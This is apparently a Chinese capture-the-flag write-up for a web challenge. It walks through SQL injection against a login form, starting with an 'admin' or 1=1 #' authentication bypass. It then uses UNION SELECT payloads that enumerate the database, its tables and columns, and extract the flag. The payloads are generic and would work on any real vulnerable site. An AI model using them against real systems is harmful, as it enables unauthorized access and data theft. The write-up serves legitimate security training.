直接是一个登录界面,在用户名处输入万能密码
admin' or 1=1 #
显示了登陆信息,现在就是去找回显位置。用order by判断当前查询的列数,order by 4的时候登陆信息消失,而order by 3的时候存在登陆信息。至此,判断回显位置
admin' or 1=1 union select 1,2,3#
看到“2”的位置为回显位,接着开始查询依次查询数据库名,表名以及字段
#查询到当前数据库名为web2
admin' or 1=1 union select 1,database(),3 #
#查询到当前数据库web2中的表名为flag,user
admin' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#
#查询到flag表中的存在flag字段
admin' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#
#直接到从flag中查询flag字段,得到flag
admin' or 1=1 union select 1,flag,3 from flag#